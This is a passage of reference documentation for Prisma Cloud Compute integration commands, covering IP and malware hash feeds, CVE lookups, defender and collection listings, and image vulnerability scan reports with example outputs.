Process spawned/usr/bin/gawkcakeagent17411December 10, 2021 21:34:03 PMawk {gsub("%", "%%", $0);printf $1 "|" $2 "|" $3 "|" $4 "|" $5 "|" $6 "|" $11 ":::"}cron
Process spawned/bin/pscakeagent17410December 10, 2021 21:34:03 PMps auxcron
Process spawned/bin/grepcakeagent17407December 10, 2021 21:34:03 PMgrep -vE ^Filesystem|tmpfs|cdromcron

prisma-cloud-compute-console-version-info#


Get the console version.

Base Command#

prisma-cloud-compute-console-version-info

Requires Role#

ci

Input#

Argument NameDescriptionRequired

Context Output#

PathTypeDescription
PrismaCloudCompute.Console.VersionStringThe console version.

Command Example#

!prisma-cloud-compute-console-version-info

Context Example#

{
"PrismaCloudCompute": {
"Console": {
"Version": "21.04.439"
}
}
}

Human Readable Output#

Console version#

Version
21.04.439

prisma-cloud-compute-custom-feeds-ip-list#


Get all the blacklisted IP addresses in the system.

Base Command#

prisma-cloud-compute-custom-feeds-ip-list

Requires Role#

auditor

Input#

Argument NameDescriptionRequired

Context Output#

PathTypeDescription
PrismaCloudCompute.CustomFeedIP.digestStringAn internal digest of the custom IP feed.
PrismaCloudCompute.CustomFeedIP.feedStringThe list of blacklisted custom IP addresses.
PrismaCloudCompute.CustomFeedIP.modifiedDateThe last time the custom feed was modified.

Command Example#

!prisma-cloud-compute-custom-feeds-ip-list

Context Example#

{
"PrismaCloudCompute": {
"CustomFeedIP": {
"feed": [
"2.2.2.2",
"1.1.1.1"
],
"modified": "December 10, 2021 21:12:32 PM",
"digest": "12345"
}
}
}

Human Readable Output#

IP Feeds#

ModifiedFeed
December 10, 2021 21:12:32 PM2.2.2.2,
1.1.1.1

prisma-cloud-compute-custom-feeds-ip-add#


Add a list of banned IP addresses to be blocked by the system.

Base Command#

prisma-cloud-compute-custom-feeds-ip-add

Requires Role#

operator

Input#

Argument NameDescriptionRequired
ipList of custom IP addresses to add to the banned IPs list that will be blocked. For example ip=1.1.1.1,2.2.2.2.Required

Context Output#

There is no context output for this command.

Command Example#

!prisma-cloud-compute-custom-feeds-ip-add IP=1.1.1.1,2.2.2.2

Human Readable Output#

Successfully updated the custom IP feeds

prisma-cloud-compute-custom-feeds-malware-list#


List all custom uploaded md5 malwares.

Base Command#

prisma-cloud-compute-custom-feeds-malware-list

Requires Role#

auditor

Input#

Argument NameDescriptionRequired
limitThe maximum number of records of custom md5 malwares to return. Default is 50.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.CustomFeedMalware.digestStringAn internal digest of the feed.
PrismaCloudCompute.CustomFeedMalware.feed.md5StringThe md5 sum of the feed.
PrismaCloudCompute.CustomFeedMalware.feed.modifiedDateThe time the malware was added to the database.
PrismaCloudCompute.CustomFeedMalware.feed.nameStringThe name of the malware feed.
PrismaCloudCompute.CustomFeedMalware.modifiedDateThe last time the custom feed was modified.

Command Example#

prisma-cloud-compute-custom-feeds-malware-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"CustomFeedMalware": {
"feed": [
{
"md5": "md5_hash1",
"name": "first_md5_hash",
"allowed": false
},
{
"md5": "md5_hash2",
"name": "second_md5_hash",
"allowed": false
}
],
"modified": "December 09, 2021 13:31:38 PM",
"digest": "1234"
}
}
}

Human Readable Output#

Malware Feeds#

NameMd5Allowed
first_md5_hashmd5_hash1false
second_md5_hashmd5_hash2false

prisma-cloud-compute-custom-feeds-malware-add#


Add custom md5 malware hashes.

Base Command#

prisma-cloud-compute-custom-feeds-malware-add

Requires Role#

operator

Input#

Argument NameDescriptionRequired
nameThe name that will be attached to the md5 records.Required
md5Comma-separated list of md5 hashes to be added.Required

Context Output#

There is no context output for this command.

Command Example#

!prisma-cloud-compute-custom-feeds-malware-add name=test md5=md5_hash1,md5_hash2,md5_hash3

Human Readable Output#

Successfully updated the custom md5 malware feeds

cve#


Get information about the CVEs in the system. Will return a maximum of 50 records. It is possible to query for a partial CVE description such as cve-2020 or cve-2014 or by severity/distro/package.

Base Command#

cve

Requires Role#

devOps

Input#

Argument NameDescriptionRequired
cveComma-separated list of CVEs, for example, cve=cve-2016-223,cve-2020-3546.Required

Context Output#

PathTypeDescription
CVE.IDStringThe ID of the CVE, for example: CVE-2015-1653
CVE.CVSSStringThe CVSS of the CVE, for example: 10.0
CVE.ModifiedDateThe timestamp of when the CVE was last modified.
CVE.DescriptionStringA description of the CVE.
DBotScore.IndicatorStringThe indicator value.
DBotScore.ScoreNumberThe indicator score.
DBotScore.TypeStringThe indicator type.
DBotScore.VendorStringThe vendor reporting the score of the indicator.
DBotScore.ReliabilityStringReliability of the source providing the intelligence data.

Command Example#

!cve cve=CVE-2021-4333

Context Example#

{
"DBotScore": [
{
"Vendor": "PaloAltoNetworks_PrismaCloudCompute",
"Indicator": "CVE-2021-43332",
"Score": 0,
"Type": "cve"
},
{
"Vendor": "PaloAltoNetworks_PrismaCloudCompute",
"Indicator": "CVE-2021-43337",
"Score": 0,
"Type": "cve"
}
],
"CVE": [
{
"ID": "CVE-2021-43331",
"CVSS": 6.1,
"Modified": "November 17, 2021 16:40:14 PM",
"Description": "In GNU Mailman before 2.1.36, a crafted URL to the Cgi/options.py user options page can execute arbitrary JavaScript for XSS."
},
{
"ID": "CVE-2021-43337",
"CVSS": 6.5,
"Modified": "November 18, 2021 08:40:01 AM",
"Description": "SchedMD Slurm 21.08.* before 21.08.4 has Incorrect Access Control. On sites using the new AccountingStoreFlags=job_script and/or job_env options, the access control rules in SlurmDBD may permit users to request job scripts and environment files to which they should not have access."
}
]
}

Human Readable Output#

CVE-2021-43332#

CVSSDescriptionIDModified
6.1In GNU Mailman before 2.1.36, the CSRF token for the Cgi/admindb.py admindb page contains an encrypted version of the list admin password. This could potentially be cracked by a moderator via an offline brute-force attack.CVE-2021-43332November 19, 2021 08:40:01 AM

CVE-2021-43337#

CVSSDescriptionIDModified
6.5SchedMD Slurm 21.08.* before 21.08.4 has Incorrect Access Control. On sites using the new AccountingStoreFlags=job_script and/or job_env options, the access control rules in SlurmDBD may permit users to request job scripts and environment files to which they should not have access.CVE-2021-43337November 18, 2021 08:40:01 AM

prisma-cloud-compute-defenders-list#


Retrieve a list of defenders and their information.

Base Command#

prisma-cloud-compute-defenders-list

Requires Role#

vulnerabilityManager

Input#

Argument NameDescriptionRequired
clusterThe cluster name by which to scope the query.Optional
hostnameName of a specific defender to retrieve. Can be retrieved from !prisma-cloud-compute-profile-host-list.Optional
typeIndicates the defender types to return (e.g., docker, dockerWindows, cri, etc).Optional
connectedIndicates whether to return only connected defenders (true) or disconnected defenders (false). Possible values are: true, false.Optional
limitThe maximum number of defender records to return. Default is 20.Optional
offsetThe offset number by which to begin listing defenders and their information. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.DefenderDetails.categoryStringThe category of the defender type (host/container/serverless). Range of acceptable values: container, host, serverless, appEmbedded
PrismaCloudCompute.DefenderDetails.certificateExpirationDateThe client's certificate expiry time.
PrismaCloudCompute.DefenderDetails.cloudMetadataUnknownThe cloud provider metadata of the host.
PrismaCloudCompute.DefenderDetails.clusterStringCThe provided cluster name. (Fallback is internal IP address.)
PrismaCloudCompute.DefenderDetails.clusterIDStringThe unique ID generated for each daemon set and used to group defenders by clusters. Note - Kubernetes does not provide a cluster name as part of its API.
PrismaCloudCompute.DefenderDetails.compatibleVersionBooleanWhether the defender has a compatible version for communication (e.g. request logs).
PrismaCloudCompute.DefenderDetails.connectedBooleanWhether the defender is connected.
PrismaCloudCompute.DefenderDetails.featuresUnknownThe features that are enabled in the defender, such as listener type.
PrismaCloudCompute.DefenderDetails.firewallProtectionUnknownThe firewall protection status of app embedded defenders.
PrismaCloudCompute.DefenderDetails.fqdnStringThe fully qualified domain name used in audit alerts to identify specific hosts.
PrismaCloudCompute.DefenderDetails.hostnameStringThe defender hostname.
PrismaCloudCompute.DefenderDetails.lastModifiedDateThe last time the defender connectivity was modified.
PrismaCloudCompute.DefenderDetails.portNumberThe communication port between the defender and the console.
PrismaCloudCompute.DefenderDetails.proxyUnknownThe proxy options of the defender.
PrismaCloudCompute.DefenderDetails.remoteLoggingSupportedBooleanWhether the defender logs can be retrieved remotely.
PrismaCloudCompute.DefenderDetails.remoteMgmtSupportedBooleanWhether the defender can be remotely managed (upgrade, restart).
PrismaCloudCompute.DefenderDetails.statusUnknownThe feature status of the defender.
PrismaCloudCompute.DefenderDetails.systemInfoUnknownThe system information of the defender host.
PrismaCloudCompute.DefenderDetails.tasClusterIDStringThe ID used to identify the TAS cluster of the defender. Typically will be the cloud controller API address
PrismaCloudCompute.DefenderDetails.typeStringThe type of the defender (registry scanner/kubernetes node/etc...).
PrismaCloudCompute.DefenderDetails.versionStringThe agent version.

Command Example#

!prisma-cloud-compute-defenders-list connected=true limit=1

Context Example#

{
"PrismaCloudCompute": {
"DefenderDetails": {
"category": "container",
"cloudMetadata": {
"resourceID": "123",
"image": "image name",
"provider": "aws",
"type": "c5.xlarge",
"region": "aws region",
"accountID": "1234"
},
"hostname": "host1",
"features": {
"proxyListenerType": "none"
},
"compatibleVersion": true,
"lastModified": "September 02, 2021 11:05:08 AM",
"firewallProtection": {
"supported": false,
"enabled": false
},
"fqdn": "host1.lab.com",
"remoteMgmtSupported": true,
"status": {
"container": {
"scanTime": "2021-12-13T11:05:14.178Z",
"completed": true
},
"features": {
"err": ""
},
"process": {
"enabled": true,
"err": ""
},
"lastModified": "0001-01-01T00:00:00Z",
"appFirewall": {
"enabled": true,
"err": ""
},
"hostNetworkFirewall": {
"enabled": true,
"err": ""
},
"hostCustomCompliance": {
"err": ""
},
"filesystem": {
"enabled": true,
"err": ""
},
"runtime": {
"enabled": true,
"err": ""
},
"image": {
"scanTime": "2021-12-13T14:19:36.09Z",
"completed": true
},
"containerNetworkFirewall": {
"enabled": true,
"err": ""
},
"network": {
"enabled": true,
"err": ""
}
},
"version": "21.04.439",
"collections": [
"All",
"123"
],
"proxy": {
"httpProxy": "",
"ca": "",
"password": {
"encrypted": ""
},
"noProxy": "",
"user": ""
},
"systemInfo": {
"kernelVersion": "4.14.123-111.109.amzn2.x86_64",
"totalDiskSpaceGB": 199,
"cpuCount": 4,
"freeDiskSpaceGB": 180,
"memoryGB": 7.446006774902344
},
"connected": true,
"remoteLoggingSupported": true,
"type": "docker",
"port": 8084,
"certificateExpiration": "2024-09-01T11:00:00Z"
}
}
}

Human Readable Output#

Defenders Information#

HostnameVersionStatusListener
host121.04.439Connected since September 02, 2021 11:05:08 AMnone

prisma-cloud-compute-collections-list#


Retrieves a list of all collections.

Base Command#

prisma-cloud-compute-collections-list

Requires Role#

auditor

Input#

Argument NameDescriptionRequired
limitThe maximum number of records of collections to return. Default is 50.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.Collection.accountIDsStringA list of the cloud account IDs
PrismaCloudCompute.Collection.appIDsStringA list of application IDs.
PrismaCloudCompute.Collection.clustersStringA list of Kubernetes cluster names.
PrismaCloudCompute.Collection.codeReposStringA list of remote code repositories.
PrismaCloudCompute.Collection.colorStringA color code associated with the collection.
PrismaCloudCompute.Collection.containersStringA list of containers that are associated with this collection.
PrismaCloudCompute.Collection.descriptionStringA free-text description of the collection.
PrismaCloudCompute.Collection.functionsStringA list of functions that are associated with this collection
PrismaCloudCompute.Collection.hostsStringA list of hosts that are associated with this collection
PrismaCloudCompute.Collection.imagesStringA list of images that are associated with this collection
PrismaCloudCompute.Collection.labelsStringA list of labels that are associated with this collection.
PrismaCloudCompute.Collection.modifiedDateThe timestamp if when the collection was last modified.
PrismaCloudCompute.Collection.nameStringA unique name associated with the collection.
PrismaCloudCompute.Collection.namespacesStringThe Kubernetes namespaces.
PrismaCloudCompute.Collection.ownerStringThe collection owner (the last user who modified the collection).
PrismaCloudCompute.Collection.systemBooleanWhether this collection was created by the system or by the user.

Command Example#

!prisma-cloud-compute-collections-list limit=1

Context Example#

{
"PrismaCloudCompute": {
"Collection": {
"functions": [
"*"
],
"appIDs": [
"*"
],
"description": "System - all resources collection",
"color": "#602DFB",
"prisma": false,
"labels": [
"*"
],
"modified": "September 02, 2021 11:05:06 AM",
"system": true,
"owner": "system",
"hosts": [
"*"
],
"namespaces": [
"*"
],
"codeRepos": [
"*"
],
"images": [
"*"
],
"clusters": [
"*"
],
"accountIDs": [
"*"
],
"containers": [
"*"
],
"name": "All"
}
}
}

Human Readable Output#

Collections Information#

NameDescriptionOwnerModified
AllSystem - all resources collectionsystemSeptember 02, 2021 11:05:06 AM

prisma-cloud-compute-container-namespace-list#


Get the containers namespaces names.

Base Command#

prisma-cloud-compute-container-namespace-list

Requires Role#

devSecOps

Input#

Argument NameDescriptionRequired
clusterComma-separated list of cluster names to filter the results by.Optional
collectionsComma-separated list of collections to filter the results by. Can be retrieved from !prisma-cloud-compute-collections-list.Optional
limitThe maximum number of namespace name records to return. Default is 50.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.RadarContainerNamespaceStringThe names of the container namespaces.

Command Example#

!prisma-cloud-compute-container-namespace-list limit=3

Context Example#

{
"PrismaCloudCompute": {
"RadarContainerNamespace": [
"namespace1",
"namespace2",
"namespace3"
]
}
}

Human Readable Output#

Collections Information#

Name
namespace1
namespace2
namespace3

prisma-cloud-compute-images-scan-list#


Get images scan report. The report includes vulnerabilities, compliance issues, binaries, etc.

Base Command#

prisma-cloud-compute-images-scan-list

Requires Role#

vulnerabilityManager

Input#

Argument NameDescriptionRequired
clustersComma-separated list of cluster names to filter the results by.Optional
compactWhether only minimal image data is to be returned (i.e., skip vulnerabilities, compliance, and extended image metadata). Possible values are: true, false. Default is true.Optional
fieldsComma-separated list of fields to retrieve. Possible values are labels, repo, registry, clusters, hosts, tag.Optional
hostnameComma-separated list of hostnames to filter the results by. Can be retrieved from !prisma-cloud-compute-profile-host-list.Optional
idComma-separated list of image IDs to filter the results by. Run !prisma-cloud-compute-images-scan-list without any arguments to get image IDs.Optional
nameComma-separated list of image names to filter the results by.Optional
registryComma-separated list of image registries to filter the results by.Optional
repositoryComma-separated list of image repositories to filter the results by.Optional
limit_recordThe maximum number of scan image records to return. Default is 10.Optional
limit_statsThe maximum number of compliance/vulnerability records to return. Default is 10.Optional
offsetThe offset by which to begin listing images scan results. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ReportsImagesScan._idStringImage identifier (image ID or repo:tag).
PrismaCloudCompute.ReportsImagesScan.allComplianceUnknownData regarding passed compliance checks.
PrismaCloudCompute.ReportsImagesScan.appEmbeddedBooleanWhether this image was scanned by an app-embedded defender.
PrismaCloudCompute.ReportsImagesScan.applicationsUnknownProducts in the image.
PrismaCloudCompute.ReportsImagesScan.baseImageStringImage’s base image name. Used when filtering the vulnerabilities by base images.
PrismaCloudCompute.ReportsImagesScan.binariesUnknownBinaries in the image.
PrismaCloudCompute.ReportsImagesScan.cloudMetadataUnknownThe metadata for an instance running in a cloud provider (AWS/GCP/Azure).
PrismaCloudCompute.ReportsImagesScan.clustersStringCluster names.
PrismaCloudCompute.ReportsImagesScan.collectionsStringCollections to which this result applies.
PrismaCloudCompute.ReportsImagesScan.complianceDistributionUnknownThe number of vulnerabilities per type.
PrismaCloudCompute.ReportsImagesScan.complianceIssuesUnknownNumber of compliance issues.
PrismaCloudCompute.ReportsImagesScan.complianceRiskScoreNumberCompliance risk score for the image.
PrismaCloudCompute.ReportsImagesScan.creationTimeDateDate/time when the image was created.
PrismaCloudCompute.ReportsImagesScan.distroStringFull name of the distribution.
PrismaCloudCompute.ReportsImagesScan.ecsClusterNameStringElastic Container Service (ECS) cluster name.
PrismaCloudCompute.ReportsImagesScan.errStringDescription of an error that occurred during image health scan.
PrismaCloudCompute.ReportsImagesScan.externalLabelsUnknownKubernetes external labels of all containers running this image.
PrismaCloudCompute.ReportsImagesScan.filesUnknownFiles in the container.
PrismaCloudCompute.ReportsImagesScan.firewallProtectionUnknownThe status of the Web-Application and API Security (WAAS) protection
PrismaCloudCompute.ReportsImagesScan.firstScanTimeDateDate/time when this image was first scanned (preserved during version updates).
PrismaCloudCompute.ReportsImagesScan.historyUnknownDocker image history.
PrismaCloudCompute.ReportsImagesScan.hostDevicesStringMap from host network device name to IP address.
PrismaCloudCompute.ReportsImagesScan.hostnameStringName of the host that was scanned.
PrismaCloudCompute.ReportsImagesScan.hostsUnknownA fast index for image scan results metadata per host.
PrismaCloudCompute.ReportsImagesScan.idStringImage ID.
PrismaCloudCompute.ReportsImagesScan.imageUnknownA container image.
PrismaCloudCompute.ReportsImagesScan.installedProductsUnknownData regarding products running in the environment.
PrismaCloudCompute.ReportsImagesScan.instancesUnknownDetails about each occurrence of the image (tag + host).
PrismaCloudCompute.ReportsImagesScan.k8sClusterAddrStringEndpoint of the Kubernetes API server.
PrismaCloudCompute.ReportsImagesScan.labelsStringImage labels.
PrismaCloudCompute.ReportsImagesScan.layersStringImage's filesystem layers. Each layer is a SHA256 digest of the filesystem diff.
PrismaCloudCompute.ReportsImagesScan.missingDistroVulnCoverageBooleanWhether the image OS is covered in the IS (true) or not (false).
PrismaCloudCompute.ReportsImagesScan.namespacesStringKubernetes namespaces of all the containers running this image.
PrismaCloudCompute.ReportsImagesScan.osDistroStringName of the OS distribution.
PrismaCloudCompute.ReportsImagesScan.osDistroReleaseStringOS distribution release.
PrismaCloudCompute.ReportsImagesScan.osDistroVersionStringOS distribution version.
PrismaCloudCompute.ReportsImagesScan.packageManagerBooleanWhether the package manager is installed for the OS.
PrismaCloudCompute.ReportsImagesScan.packagesUnknownPackages that exist in the image.
PrismaCloudCompute.ReportsImagesScan.registryNamespaceStringIBM cloud namespace to which the image belongs.
PrismaCloudCompute.ReportsImagesScan.repoDigestsStringDigests of the image. Used for content trust (notary). Has one digest per tag.
PrismaCloudCompute.ReportsImagesScan.repoTagUnknownAn image repository and its associated tag or registry digest.
PrismaCloudCompute.ReportsImagesScan.rhelReposStringThe (RPM) repositories IDs from which the packages in this image were installed. Used for matching vulnerabilities by Red Hat CPEs.
PrismaCloudCompute.ReportsImagesScan.riskFactorsUnknownThe mapping of the existence of vulnerability risk factors.
PrismaCloudCompute.ReportsImagesScan.scanIDStringScan ID.
PrismaCloudCompute.ReportsImagesScan.scanTimeDateDate/time of the last scan of the image.
PrismaCloudCompute.ReportsImagesScan.scanVersionStringDefender version that published the image.
PrismaCloudCompute.ReportsImagesScan.startupBinariesUnknownBinaries that are expected to run when the container is created from this image.
PrismaCloudCompute.ReportsImagesScan.tagsUnknownTags associated with the given image.
PrismaCloudCompute.ReportsImagesScan.topLayerStringSHA256 of the image's last layer that is the last element of the Layers field.
PrismaCloudCompute.ReportsImagesScan.trustResultUnknownAn aggregated image trust result.
PrismaCloudCompute.ReportsImagesScan.trustStatusStringThe trust status for an image.
PrismaCloudCompute.ReportsImagesScan.twistlockImageBooleanWhether the image is a Twistlock image (true) or not (false).
PrismaCloudCompute.ReportsImagesScan.typeUnknownThe scanning type performed.
PrismaCloudCompute.ReportsImagesScan.vulnerabilitiesUnknownCVE vulnerabilities of the image.
PrismaCloudCompute.ReportsImagesScan.vulnerabilitiesCountNumberTotal number of vulnerabilities.
PrismaCloudCompute.ReportsImagesScan.vulnerabilityDistributionUnknownThe number of vulnerabilities per type.
PrismaCloudCompute.ReportsImagesScan.vulnerabilityRiskScoreNumberImage's CVE risk score.
PrismaCloudCompute.ReportsImagesScan.wildFireUsageUnknownThe Wildfire usage stats. The period for the usage varies with the context.
PrismaCloudCompute.ReportsImagesScan.complianceIssuesCountNumberNumber of compliance issues.

Command Example#

!prisma-cloud-compute-images-scan-list id=image123 limit_stats=2 compact=false

Context Example#

{
"PrismaCloudCompute": {
"ReportsImagesScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "",
"vulnerabilityDistribution": {
"high": 28,
"total": 60,
"medium": 20,
"critical": 12,
"low": 0
},
"image": {
"created": "2018-05-10T10:32:49.309Z"
},
"instances": [
{
"image": "demisto/python:1.3-alpine",
"modified": "2021-12-14T14:19:36.091Z",
"repo": "demisto/python",
"host": "host123",
"tag": "1.3-alpine",
"registry": ""
}
],
"complianceIssues": [
{
"templates": [
"PCI",
"DISA STIG"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 41,
"severity": "high",
"title": "(CIS_Docker_v1.2.0 - 4.1) Image should be created with a non-root user",
"packageVersion": "",
"cause": "",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "It is a good practice to run the container as a non-root user, if possible. Though user\nnamespace mapping is now available, if a user is already defined in the container image, the\ncontainer is run as that user by default and specific user namespace remapping is not\nrequired",
"link": "",
"cri": false,
"riskFactors": null,
"type": "image",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
}
],
"repoTag": {
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
},
"packageManager": true,
"repoDigests": [
"demisto/python@sha256:0bfa24a116efb99c51076ee3801ee8de80e5998a0f85522599c7036dea8a67f1"
],
"id": "image123",
"layers": [
"sha256:04a094fe844e055828cb2d64ead6bd3eb4257e7c7b5d1e2af0da89fa20472cf4",
"sha256:b901e62fe587b147e801712b7833942a540492af8f67cc683ac5a3b7bcbf7eda",
"sha256:240070abd5cc482cbe83e70710e9c161105bf1b69fc4551ceedac541aec1e552",
"sha256:08ed7077578e63f32e98ec38644705d67aec68661663cfa43e7e771f37ac781b",
"sha256:25f89c88aa30915565de42481044fdc3edcde2edcd88c32098b16adbe09c65ec",
"sha256:607e311316ef7ea1437fe4b8f7a6f04f9a61b0f21e2d4ee0611c05bd1d245ff7",
"sha256:21511d4e2cf5964090236c3db6aa38c23f8937aab18226dd1898ef4346fa9a3c",
"sha256:9ec31cab0619e95e88291cd611370e4d0f61d540862496b89eed00845d48a3a8",
"sha256:ce388cb57837216290c2ec5c33ee70ff50ee70a479fdc401f9170f278e68c15d",
"sha256:887b26e25244256638869a154e4b7427f124a1ef64723ea7082096025e7f1520",
"sha256:40c6aaccab9bea3953dfa459e3426d0f8a23fda23ec5495404ae21afa94af475",
"sha256:082ca23ed20f62157e6b3958ed4899fccd6de2501468f668874d746f0af1bc69",
"sha256:e252153001780e97deed131418ef8ed0ad8176f55e14916a338120cc8a464af8",
"sha256:11f9d19047c7dfc84742694c7c7db04ceb346bf60e44a8a28947937aa3408ba2",
"sha256:1945710968a74b7692f635829f9dac189df097b8f7d135aa51f6726dccb2a2be",
"sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6"
],
"packages": [
{
"pkgsType": "package",
"pkgs": [
{
"name": "busybox",
"version": "1.27.2-r8",
"cveCount": 450,
"license": "GPL2",
"layerTime": 1525948365
},
{
"name": "apk-tools",
"version": "2.9.1-r2",
"cveCount": 25,
"license": "GPL2",
"layerTime": 1512154128
}
]
},
{
"pkgsType": "python",
"pkgs": [
{
"name": "python",
"version": "2.7.14",
"cveCount": 65,
"license": "PSF license",
"layerTime": 1513722622
},
{
"name": "certifi",
"version": "2017.11.5",
"cveCount": 0,
"license": "MPL-2.0",
"layerTime": 1515337812
}
]
}
],
"complianceDistribution": {
"high": 1,
"total": 1,
"medium": 0,
"critical": 0,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"allCompliance": {},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "Alpine Linux v3.7",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": [
{
"path": "/usr/local/bin/python2.7",
"cveCount": 0,
"name": "python",
"md5": "dc8c57a9674d54da18637ffea29eeaba"
}
],
"scanVersion": "21.04.439",
"type": "image",
"distro": "Alpine Linux v3.7",
"files": [],
"scanID": 0,
"osDistro": "alpine",
"tags": [
{
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
}
],
"Secrets": [],
"applications": [
{
"knownVulnerabilities": 26,
"path": "/bin/busybox",
"version": "1.27.2",
"layerTime": 1525948355,
"name": "busybox"
}
],
"osDistroRelease": "3.7.0",
"topLayer": "sha256:9dfc2f79a6a83bd3791f4b6c621850b49db37ff729cdc17fd0a7b0ec373338c6",
"osDistroVersion": "3.7.0",
"trustStatus": "trusted",
"firstScanTime": "2021-09-02T11:05:27.439Z",
"_id": "image123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Critical severity": {},
"Medium severity": {},
"DoS": {}
},
"err": "",
"vulnerabilitiesCount": 60,
"scanTime": "2021-12-14T14:19:36.091Z",
"complianceIssuesCount": 1,
"creationTime": "2018-05-10T10:32:49.309Z",
"vulnerabilities": [
{
"templates": null,
"vecStr": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"text": "",
"discovered": "2021-09-02T11:05:27Z",
"exploit": "",
"layerTime": 1525948365,
"id": 46,
"applicableRules": [
"<1.30.0"
],
"severity": "high",
"title": "",
"packageVersion": "1.27.2-r8",
"cause": "",
"cvss": 7.5,
"status": "fixed in 1.30.1-r5",
"twistlock": false,
"fixDate": "January 09, 2019 16:29:00 PM",
"description": "An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes.",
"link": "https://nvd.nist.gov/vuln/detail/CVE-2018-20679",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"High severity": {},
"Attack vector: network": {},
"Has fix": {}
},
"type": "image",
"packageName": "busybox",
"functionLayer": "",
"published": 1547051340,
"cve": "CVE-2018-20679"
},
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"text": "",
"discovered": "2021-09-02T11:05:27Z",
"exploit": "",
"layerTime": 1525948365,
"id": 46,
"applicableRules": [
"<1.29.0"
],
"severity": "critical",
"title": "",
"packageVersion": "1.27.2-r8",
"cause": "",
"cvss": 9.8,
"status": "fixed in 1.29.3-r10",
"twistlock": false,
"fixDate": "June 26, 2018 16:29:00 PM",
"description": "BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e.",
"link": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000517",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"Attack vector: network": {},
"Has fix": {},
"Critical severity": {}
},
"type": "image",
"packageName": "busybox",
"functionLayer": "",
"published": 1530030540,
"cve": "CVE-2018-1000517"
}
],
"hosts": {
"host123": {
"modified": "2021-12-14T14:19:36.091Z"
}
},
"complianceRiskScore": 10000,
"wildFireUsage": null,
"binaries": [
{
"path": "/bin/busybox",
"version": "1.27.2",
"cveCount": 0,
"name": "busybox",
"md5": "17890907c72a9aa14c5580faf4f6a30a"
},
{
"path": "/sbin/apk",
"cveCount": 0,
"name": "apk",
"md5": "8f77c14fa2ab4f668f6af4bfa3e12587"
}
],
"vulnerabilityRiskScore": 12282000,
"history": [
{
"sizeBytes": 4143684,
"instruction": "ADD file:2b00f26f6004576e2f8faeb3fb0517a14f79ea89a059fe096b54cbecf5da512e in / ",
"emptyLayer": false,
"id": "<missing>",
"created": 1512154128
},
{
"instruction": "CMD [\"/bin/sh\"]",
"emptyLayer": true,
"id": "<missing>",
"created": 1512154128
}
]
}
}
}

Human Readable Output#

Image description#

IDImageOS DistributionVulnerabilities CountCompliance Issues Count
image123demisto/python:1.3-alpineAlpine Linux v3.7601

Vulnerabilities#

CveDescriptionSeverityPackage NameStatusFix Date
CVE-2018-20679An issue was discovered in BusyBox before 1.30.0. An out of bounds read in udhcp components (consumed by the DHCP server, client, and relay) allows a remote attacker to leak sensitive information from the stack by sending a crafted DHCP message. This is related to verification in udhcp_get_option() in networking/udhcp/common.c that 4-byte options are indeed 4 bytes.highbusyboxfixed in 1.30.1-r5January 09, 2019 16:29:00 PM
CVE-2018-1000517BusyBox project BusyBox wget version prior to commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e contains a Buffer Overflow vulnerability in Busybox wget that can result in heap buffer overflow. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in after commit 8e2174e9bd836e53c8b9c6e00d1bc6e2a718686e.criticalbusyboxfixed in 1.29.3-r10June 26, 2018 16:29:00 PM

Compliances#

IdSeverityDescription
41highIt is a good practice to run the container as a non-root user, if possible. Though user
namespace mapping is now available, if a user is already defined in the container image, the
container is run as that user by default and specific user namespace remapping is not
required

Command Example#

!prisma-cloud-compute-images-scan-list id=image123 limit_stats=2 compact=true

Context Example#

{
"PrismaCloudCompute": {
"ReportsImagesScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "",
"vulnerabilityDistribution": {
"high": 28,
"total": 60,
"medium": 20,
"critical": 12,
"low": 0
},
"image": {
"created": "2018-05-10T10:32:49.309Z"
},
"instances": [
{
"image": "demisto/python:1.3-alpine",
"modified": "2021-12-14T14:19:36.091Z",
"repo": "demisto/python",
"host": "host123",
"tag": "1.3-alpine",
"registry": ""
}
],
"complianceIssues": null,
"repoTag": {
"repo": "demisto/python",
"tag": "1.3-alpine",
"registry": ""
},
"packageManager": false,
"repoDigests": [
"123"
],
"id": "image123",
"packages": null,
"complianceDistribution": {
"high": 1,
"total": 1,
